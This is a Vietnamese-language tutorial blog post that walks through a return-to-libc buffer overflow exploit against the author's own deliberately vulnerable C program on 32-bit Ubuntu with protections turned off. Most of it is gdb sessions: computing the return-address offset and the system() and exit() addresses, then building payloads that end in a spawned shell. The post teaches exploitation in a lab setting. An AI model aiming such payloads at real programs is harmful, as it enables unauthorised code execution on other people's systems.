Tutorial BOF : Return 2 Libc

Đã một thời gian dài mình không viết bài 
Hôm nay mình sẽ làm một bài tut khá đơn giản về Buffer Overflow, return2libc
return2libc muc đích để bypass DEP policy, ngăn không cho ta execute shellcode trong stack.
về DEP policy có thể tham khảo ở đây

Vào đề luôn 
Source code :

#include 
#include 
#include 
 
void greeting(char *arg,char *arg1){
 char buff[512];
 strcpy(buff,arg1);
 printf("Hello %s %s\n",arg,buff);
}
 
int main(int argc, char **argv){
 greeting(argv[1],argv[2]);
 printf("Bye %s %s\n",argv[1],argv[2]);
 return 0;
}

Yêu cầu bài tut:
– Hệ thống test Ubuntu 13.04 32bit
– Compiler: gcc -fno-stack-protector demo.c -o demo
– Tắt ASRL
Do Ubuntu bật DEP policy tự động nên với compiler này bạn không thể exploit bằng cách chèn shellcode.

Ta nên biết rằng các hàm C chuẩn printf,strcpy,…. là các hàm std C nằm ở thư viện libc6.so
Mặc định những hàm này dù bạn không gọi thì nó vẫn được mặc định link tới libc6.so khi compiler và khi run những hàm này được load vào chương trình.
Nghĩa là nếu chương trình bạn chỉ call printf nhưng khi execute libc6.so được load thì bạn vẫn có các hàm chuẩn khác mặc dù chưa call chúng.

Bắt đầu debug
hàm strcpy(buff,arg1); là hàm gây ra buffer overflow

Sử dụng tool patter_create.py của mình tham khảo ở https://github.com/peternguyen93/gdb_tools.

(gdb) run MR `python ~/gdb_tool/pattern_create.py -l 1000 -v`
Starting program: /home/peternguyen/meet MR `python ~/gdb_tool/pattern_create.py -l 1000 -v`
 
Program received signal SIGSEGV, Segmentation fault.
0xb7e6c6a5 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
(gdb) bt
#0  0xb7e6c6a5 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
#1  0xb7e7181f in printf () from /lib/i386-linux-gnu/libc.so.6
#2  0x08048487 in greeting ()
#3  0x35724134 in ?? ()
#4  0x41367241 in ?? ()
#5  0x72413772 in ?? ()
#6  0x39724138 in ?? ()
#7  0x41307341 in ?? ()
#8  0x73413173 in ?? ()
#9  0x33734132 in ?? ()
#10 0x41347341 in ?? ()
#11 0x73413573 in ?? ()
#12 0x37734136 in ?? ()
#13 0x41387341 in ?? ()
#14 0x74413973 in ?? ()
#15 0x31744130 in ?? ()
#16 0x41327441 in ?? ()
#17 0x74413374 in ?? ()
#18 0x35744134 in ?? ()
#19 0x41367441 in ?? ()
---Type  to continue, or q  to quit---

Chương trình crash tại #3 0x35724134 in ?? ()
Tính Offset EIP

(gdb) python
>import os
>os.system('python ~/gdb_tool/pattern_create.py -l 1000 -b 0x35724134')
>end
-> EIP offset : 524

Chúng ta đã calculate được offset của EIP trong stack frame khá dễ dàng 
Bắt đầu exploit ở đây mính sẽ return về hàm system là 1 hảm chuẩn trong libc6.so<
ta biết rằng vd hàm function_a(arg1,arg2) khi call hàm này trong stack frame thì có dạng sau
—————-
|address arg1 |
—————-
|address arg2 |
—————-
|return address|
—————-
|call funtion_a|
—————-
Biết system(‘ls’) fork process và execute lệnh sh 
Payload : ‘A’*524+address_system+’AAAA’+address_command_string
để tính được address_command_string khá là đơn giản

hàm gây ra Buffer Overflow ở hàm greeting, disas hàm greeting xem nào 

(gdb) disas greeting
Dump of assembler code for function greeting:
   0x0804844c :     push   ebp
   0x0804844d :     mov    ebp,esp
   0x0804844f :     sub    esp,0x218
   0x08048455 :     mov    eax,DWORD PTR [ebp+0xc]
   0x08048458 :    mov    DWORD PTR [esp+0x4],eax
   0x0804845c :    lea    eax,[ebp-0x208]
   0x08048462 :    mov    DWORD PTR [esp],eax
   0x08048465 :    call   0x8048320 
   0x0804846a :    lea    eax,[ebp-0x208]
   0x08048470 :    mov    DWORD PTR [esp+0x8],eax
   0x08048474 :    mov    eax,DWORD PTR [ebp+0x8]
   0x08048477 :    mov    DWORD PTR [esp+0x4],eax
   0x0804847b :    mov    DWORD PTR [esp],0x8048570
   0x08048482 :    call   0x8048310 
   0x08048487 :    leave  
   0x08048488 :    ret    
End of assembler dump.

set break point ở 0x0804846a

(gdb) b *0x0804846a
Breakpoint 1 at 0x804846a
(gdb) run MR `python -c 'print "A"*524+"CCCC"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/peternguyen/meet MR `python -c 'print "A"*524+"CCCC"'`
 
Breakpoint 1, 0x0804846a in greeting ()
(gdb) i r
eax            0xbffff270       -1073745296
ecx            0xbffff890       -1073743728
edx            0xbffff47a       -1073744774
ebx            0xb7fd2000       -1208147968
esp            0xbffff260       0xbffff260
ebp            0xbffff478       0xbffff478
esi            0x0      0
edi            0x0      0
eip            0x804846a        0x804846a 
eflags         0x202    [ IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51

hàm strcpy call và return lại address của chuỗi buff  0xbffff270

(gdb) d 1
(gdb) b main
Breakpoint 1 at 0x804848c
(gdb) p system
$1 = {} 0xb7e64280 
(gdb) p exit
$1 = {} 0xb7e56820

—junk- ——system—– ——exit——
Payload ‘A’*524+’\x80\x42\xe6\xb7’+’\x20\x68\xe5\xb7’+address_command_str+command_str
address_command_str = 0xbffff270+524+4+4+4

(gdb) python print hex(0xbffff270+524+4+4+4)
0xbffff488

Run Payload nào 

(gdb) run MR `python -c 'print "A"*524+"\x80\x42\xe6\xb7"+"\x20\x68\xe5\xb7"+"\x88\xf4\xff\xbf"+"sh"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/peternguyen/meet MR `python -c 'print "A"*524+"\x80\x42\xe6\xb7"+"\x20\x68\xe5\xb7"+"\x88\xf4\xff\xbf"+"sh"'`
Hello 
       AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�B�
sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�B��: File name too long
 
Program received signal SIGSEGV, Segmentation fault.
0xbffff600 in ?? ()

Có vẻ như system đã load 1 address command line trong address của biến buffer, disas greeting break point lại và xem tại sao lại như vậy 

(gdb) b *0x08048482
Breakpoint 3 at 0x8048482
(gdb) run MR `python -c 'print "A"*524+"\x80\x42\xe6\xb7"+"AAAA"+"\x88\xf4\xff\xbf"+"sh"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/peternguyen/meet MR `python -c 'print "A"*524+"\x80\x42\xe6\xb7"+"AAAA"+"\x88\xf4\xff\xbf"+"sh"'`
 
Breakpoint 3, 0x08048482 in greeting ()
(gdb) i r
eax            0x41414141       1094795585
ecx            0xbffff890       -1073743728
edx            0xbffff484       -1073744764
ebx            0xb7fd2000       -1208147968
esp            0xbffff260       0xbffff260
ebp            0xbffff478       0xbffff478
esi            0x0      0
edi            0x0      0
eip            0x8048482        0x8048482 
eflags         0x202    [ IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51

để ý eax bị override thành AAAA
break point từng line của các lệnh sau:
0x0804846a : lea eax,[ebp-0x208]
0x08048470 : mov DWORD PTR [esp+0x8],eax
0x08048474 : mov eax,DWORD PTR [ebp+0x8]
0x08048477 : mov DWORD PTR [esp+0x4],eax
0x0804847b : mov DWORD PTR [esp],0x8048570

(gdb) run MR `python -c 'print "A"*524+"\x80\x42\xe6\xb7"+"AAAA"+"\x88\xf4\xff\xbf"+"sh"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/peternguyen/meet MR `python -c 'print "A"*524+"\x80\x42\xe6\xb7"+"AAAA"+"\x88\xf4\xff\xbf"+"sh"'`
 
Breakpoint 4, 0x0804846a in greeting ()
(gdb) i r
eax            0xbffff270       -1073745296
ecx            0xbffff890       -1073743728
edx            0xbffff484       -1073744764
ebx            0xb7fd2000       -1208147968
esp            0xbffff260       0xbffff260
ebp            0xbffff478       0xbffff478
esi            0x0      0
edi            0x0      0
eip            0x804846a        0x804846a 
eflags         0x202    [ IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x/20x 0xbffff270
0xbffff270:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff280:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff290:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff2a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff2b0:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb) c
Continuing.
 
Breakpoint 5, 0x08048470 in greeting ()
(gdb) i r
eax            0xbffff270       -1073745296
ecx            0xbffff890       -1073743728
edx            0xbffff484       -1073744764
ebx            0xb7fd2000       -1208147968
esp            0xbffff260       0xbffff260
ebp            0xbffff478       0xbffff478
esi            0x0      0
edi            0x0      0
eip            0x8048470        0x8048470 
eflags         0x202    [ IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) c
Continuing.
 
Breakpoint 6, 0x08048474 in greeting ()
(gdb) i r
eax            0xbffff270       -1073745296
ecx            0xbffff890       -1073743728
edx            0xbffff484       -1073744764
ebx            0xb7fd2000       -1208147968
esp            0xbffff260       0xbffff260
ebp            0xbffff478       0xbffff478
esi            0x0      0
edi            0x0      0
eip            0x8048474        0x8048474 
eflags         0x202    [ IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x/20x 0xbffff260+8
0xbffff268:     0xbffff270      0xb7fdcdc8      0x41414141      0x41414141
0xbffff278:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff288:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff298:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff2a8:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb) disas greeting
Dump of assembler code for function greeting:
   0x0804844c :     push   ebp
   0x0804844d :     mov    ebp,esp
   0x0804844f :     sub    esp,0x218
   0x08048455 :     mov    eax,DWORD PTR [ebp+0xc]
   0x08048458 :    mov    DWORD PTR [esp+0x4],eax
   0x0804845c :    lea    eax,[ebp-0x208]
   0x08048462 :    mov    DWORD PTR [esp],eax
   0x08048465 :    call   0x8048320 
   0x0804846a :    lea    eax,[ebp-0x208]
   0x08048470 :    mov    DWORD PTR [esp+0x8],eax
=> 0x08048474 :    mov    eax,DWORD PTR [ebp+0x8]
   0x08048477 :    mov    DWORD PTR [esp+0x4],eax
   0x0804847b :    mov    DWORD PTR [esp],0x8048570
   0x08048482 :    call   0x8048310 
   0x08048487 :    leave  
   0x08048488 :    ret    
End of assembler dump.
(gdb) i r eax
eax            0xbffff270       -1073745296
(gdb) i r esp+0x8
Invalid register `esp+0x8'
(gdb) x/10x $esp+0x8
0xbffff268:     0xbffff270      0xb7fdcdc8      0x41414141      0x41414141
0xbffff278:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff288:     0x41414141      0x41414141
gdb) c
Continuing.
Breakpoint 4, 0x08048477 in greeting ()
(gdb) i r
eax            0x41414141       1094795585
ecx            0xbffff890       -1073743728
edx            0xbffff484       -1073744764
ebx            0xb7fd2000       -1208147968
esp            0xbffff260       0xbffff260
ebp            0xbffff478       0xbffff478
esi            0x0      0
edi            0x0      0
eip            0x8048477        0x8048477 
eflags         0x202    [ IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51

ta thấy line này đã gây ra lỗi
mov eax,DWORD PTR [ebp+0x8]

xét lại đoạn code
0x0804846a : lea eax,[ebp-0x208]
0x08048470 : mov DWORD PTR [esp+0x8],eax
0x08048474 : mov eax,DWORD PTR [ebp+0x8]
=> 0x08048477 : mov DWORD PTR [esp+0x4],eax
0x0804847b : mov DWORD PTR [esp],0x8048570
line 1 : copy địa chỉ của biến buff vào eax
line 2 : copy eax value vào địa chỉ esp+0x8 = 0xbffff260+0x8 => 0xbffff268: 0xbffff270
line 3 : copy địa chỉ biến arg vào eax (ebp+0x8)

(gdb) x/10x $ebp+0x8
0xbffff480:     0x41414141      0xbffff488      0x08006873      0xb7fd2000
0xbffff490:     0x080484e0      0x00000000      0x00000000      0xb7e3c935
0xbffff4a0:     0x00000003      0xbffff534

=> chính là phần input mà ta đã nhập vào 
nết set tiếp break point tại printf
ta sẽ có được

(gdb) x/10x $esp+0x8
0xbffff268:     0xbffff270      0xb7fdcdc8      0x41414141      0x41414141
0xbffff278:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff288:     0x41414141      0x41414141
(gdb) x/10x $esp+0x4
0xbffff264:     0x41414141      0xbffff270      0xb7fdcdc8      0x41414141
0xbffff274:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff284:     0x41414141      0x41414141
(gdb) x/10x $esp
0xbffff260:     0x08048570      0x41414141      0xbffff270      0xb7fdcdc8
0xbffff270:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff280:     0x41414141      0x41414141

print(straddr,arg,buff)
địa chỉ của arg bị override thành 0x41414141 nên khi printf call thì printf call vprintf thì bị crash.

(gdb) bt
#0  0xb7e6c6a5 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
#1  0xb7e7181f in printf () from /lib/i386-linux-gnu/libc.so.6
#2  0x08048487 in greeting ()
#3  0xb7e64280 in ?? () from /lib/i386-linux-gnu/libc.so.6

chỉnh sửa lại payload chút

(gdb) run `python -c 'print "A"*524+"\x80\x42\xe6\xb7"'`
Starting program: /home/peternguyen/meet run `python -c 'print "A"*524+"\x80\x42\xe6\xb7"'`
Hello � AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�B�
sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�B��: File name too long
 
Program received signal SIGSEGV, Segmentation fault.
0xbffff600 in ?? ()

0xbffff600 => tại sao lại vậy ở đâu ra, set break point lại các line sau 
0x08048474 : mov eax,DWORD PTR [ebp+0x8]
0x08048477 : mov DWORD PTR [esp+0x4],eax
0x0804847b : mov DWORD PTR [esp],0x8048570
=> 0x08048482 : call 0x8048310
0x08048487 : leave

gdb) run MR `python -c 'print "sh;"+"A"*521+"\x80\x42\xe6\xb7"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/peternguyen/meet MR `python -c 'print "sh;"+"A"*521+"\x80\x42\xe6\xb7"'`
 
Breakpoint 1, 0x08048474 in greeting ()
(gdb) i r
eax            0xbffff270       -1073745296
ecx            0xbffff890       -1073743728
edx            0xbffff47a       -1073744774
ebx            0xb7fd2000       -1208147968
esp            0xbffff260       0xbffff260
ebp            0xbffff478       0xbffff478
esi            0x0      0
edi            0x0      0
eip            0x8048474        0x8048474 
eflags         0x202    [ IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) c 
Continuing.
 
Breakpoint 2, 0x08048477 in greeting ()
(gdb) x/10x $ebp
0xbffff478:     0x41414141      0xb7e64280      0xbffff600      0xbffff686
0xbffff488:     0x080484eb      0xb7fd2000      0x080484e0      0x00000000
0xbffff498:     0x00000000      0xb7e3c935

đây chính là input ta nhập vào ở lần debug trên với input được + ‘A’*4 thì AAAA override lại 0xbffff600 nên ct bị crash ở vprintf

(gdb) x/10x $esp
0xbffff260:     0x08048570      0xbffff600      0xbffff270      0xb7fdcdc8
0xbffff270:     0x413b6873      0x41414141      0x41414141      0x41414141
0xbffff280:     0x41414141      0x41414141

printf(0x08048570(format str),0xbffff600 = arg,0xbffff270=>buff)
khi call hàm printf -> vprintf không có lỗi
khi lệnh ret execute chương trình sẽ về hàm main và execute system với arg = 0xbffff686# buffer

(gdb) run MR `python -c 'print "sh;"+"A"*521+"\x80\x42\xe6\xb7"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/peternguyen/meet MR `python -c 'print "sh;"+"A"*521+"\x80\x42\xe6\xb7"'`
Hello � sh;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�B�
$ id
uid=1000(peternguyen) gid=1000(peternguyen) groups=1000(peternguyen),4(adm),24(cdrom),27(sudo),30(dip),33(www-data),46(plugdev),111(lpadmin),112(sambashare)

trên đây là 1 cái example về ret2libc có vẻ không chính thống ở đây mình sẽ sử dụng lại payload đầu và calculate lại
command string address
quay lại lên trên ta thây ebp : 0xbffff478
stack: ebp + eip + returnaddr + addresscommand+command
=> addresscommand : 0xbffff478+4+4+4

(gdb) run MR `python -c 'print "sh;"+"A"*521+"\x80\x42\xe6\xb7"+"\x20\x68\xe5\xb7"+"\x84\xf4\xff\xbf"+"sh"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/peternguyen/meet MR `python -c 'print "sh;"+"A"*521+"\x80\x42\xe6\xb7"+"\x20\x68\xe5\xb7"+"\x84\xf4\xff\xbf"+"sh"'`
Hello 
       sh;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�B�
$ id
uid=1000(peternguyen) gid=1000(peternguyen) groups=1000(peternguyen),4(adm),24(cdrom),27(sudo),30(dip),33(www-data),46(plugdev),111(lpadmin),112(sambashare)

Sỡ dĩ mình viết bài này kỹ nhiều hướng exploit bằng ret2libc khác nhau để các bạn thấy được rằng cách khi mình học và nghiên cứu không chỉ dựa vào sách, vì có những cái khi bạn thực hành theo sách nó không đúng, vì compiler và OS của sách có lẽ sẽ khác với những gì bạn có. Mình tóm lại 1 câu nếu các bạn đam mê và chịu khó, không nản lòng thì vấn đề gì cũng có thể giải quyết được. 
Hy vọng bài tut này hữu ích với các bạn. Thân